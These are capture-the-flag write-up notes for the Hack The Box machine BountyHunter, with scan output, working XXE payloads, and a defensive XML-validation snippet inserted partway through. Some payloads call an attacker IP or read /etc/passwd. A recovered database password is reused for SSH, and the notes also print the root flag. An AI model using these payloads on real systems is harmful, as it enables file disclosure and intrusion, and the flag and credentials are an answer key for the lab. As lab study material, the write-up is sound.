BountyHunter - 30.07.2021


Nmap

┌──(kali㉿kali-os)-[~/htb/bountyhunter/nmap]
└─$ nmap -sC -sV -oA bounty 10.10.11.100 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 18:55 EDT
Nmap scan report for 10.10.11.100
Host is up (0.087s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GoBuster

/index.php            (Status: 200) [Size: 25169]
/.                    (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]    
/portal.php           (Status: 200) [Size: 125]

/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]   
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]      
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]


Interesting POST

<!-- To configure the contact form email address, go to mail/contact_me.php and update the email address in the PHP file on line 19.-->

Tasks:

[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

Blind XXE

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "http://10.10.14.63:1337/test" >]>
<ippsec>&xxe;</ippsec>
<bugreport>
<title>tytul</title>
</bugreport>

We got a response from the server

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
	<!ENTITY % xxe SYSTEM "http://10.10.14.63:1337/test.xml">%xxe;%param1;]>
<ippsec>&thefile;</ippsec>
 
<bugreport>
<title>tytul</title>
</bugreport>

This one, however, worked:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

		<bugreport>
		<title>&xxe;</title>
		<cwe>costam</cwe>
		<cvss>12312</cvss>
		<reward>453234234</reward>
		</bugreport>

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

Unfortunately, id_rsa in .ssh could not be read
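As an added example (not code from the box or from this writeup), the defending side of the bugreport endpoint: a pre-scan that refuses any DOCTYPE before the report is parsed, so the entity payloads above are rejected while a normal report is accepted. The field names follow the XML above; the endpoint logic itself is an assumption.

```python
# Added example: assumed server-side validation for <bugreport> submissions.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

FIELDS = ("title", "cwe", "cvss", "reward")

class DoctypeForbidden(ValueError):
    """Raised when a submitted report carries a DOCTYPE (entity declarations)."""

def assert_no_doctype(data: str) -> None:
    # Handler-only expat pass: the doctype callback fires before any entity
    # can be declared or resolved, and the exception aborts parsing there.
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' not allowed in bug reports")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)

def parse_bugreport(data: str) -> dict:
    """Validate a submission and return its fields; rejects XXE-style input."""
    assert_no_doctype(data)
    root = ET.fromstring(data)
    if root.tag != "bugreport":
        raise ValueError("root element must be <bugreport>")
    report = {}
    for field in FIELDS:
        node = root.find(field)
        if node is None or not (node.text or "").strip():
            raise ValueError(f"missing <{field}>")
        report[field] = node.text.strip()
    return report

# Constructed inputs: a normal report and the file-read payload from above.
BENIGN = """<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport><title>tytul</title><cwe>costam</cwe><cvss>12312</cvss><reward>453234234</reward></bugreport>"""

XXE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport><title>&xxe;</title><cwe>costam</cwe><cvss>12312</cvss><reward>453234234</reward></bugreport>"""

def is_rejected(data: str) -> bool:
    """True when the submission is refused for any reason (DOCTYPE, malformed, missing field)."""
    try:
        parse_bugreport(data)
    except (DoctypeForbidden, ET.ParseError, expat.ExpatError, ValueError):
        return True
    return False
```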

Trying to log in over SSH with the password above:

ssh development@10.10.11.100			password: m19RoAU0hP41A1sTsq6K

It worked :)


Privilege Escalation

sudo python3.8 /opt/skytrain_inc/ticketValidator.py ????

After small changes, the ticketValidator.py script started working

There was a snag with the import; it was enough to add two underscores __ in the import

root.txt

d73ac628f0ae8d232bfefb3f0e5dc32e